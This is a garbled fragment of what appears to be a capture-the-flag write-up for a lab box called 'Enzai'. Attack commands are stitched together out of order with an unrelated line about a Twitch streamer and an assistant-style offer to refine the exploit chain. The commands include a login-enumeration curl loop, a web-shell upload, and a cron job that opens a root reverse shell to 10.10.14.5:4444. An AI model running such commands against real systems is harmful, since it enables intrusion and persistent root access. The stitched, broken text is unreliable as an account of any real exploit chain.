for user in admin root test guest; do curl -s -X POST -d "username=$user&password=foo" http://10.10.10.23/login.php | grep -i "invalid password" done
-rwsr-xr-x 1 root root 48K May 10 2021 /opt/enzai/scripts/backup.sh enzai__x
On Twitch , the identity (sometimes under variations like "enzzai") is used for live broadcasting, including "Just Chatting" sessions and gaming clips. for user in admin root test guest; do
If you have any extra details (e.g., the IP address, a hint about the service stack, or a screenshot of the initial banner) feel free to drop them in the chat – I’ll be able to tighten the write‑up to the exact exploit chain. | +----+-----------------------------------+
# 1️⃣ Create a cron job that runs our reverse shell as root echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'" > /etc/cron.d/enzai_root
# 2️⃣ POST it curl -F "file=@shell.php" http://10.10.10.23/upload.php
+----+-----------------------------------+ | id | flag | +----+-----------------------------------+ | 1 | HTBEnzai_X_Exploited! | +----+-----------------------------------+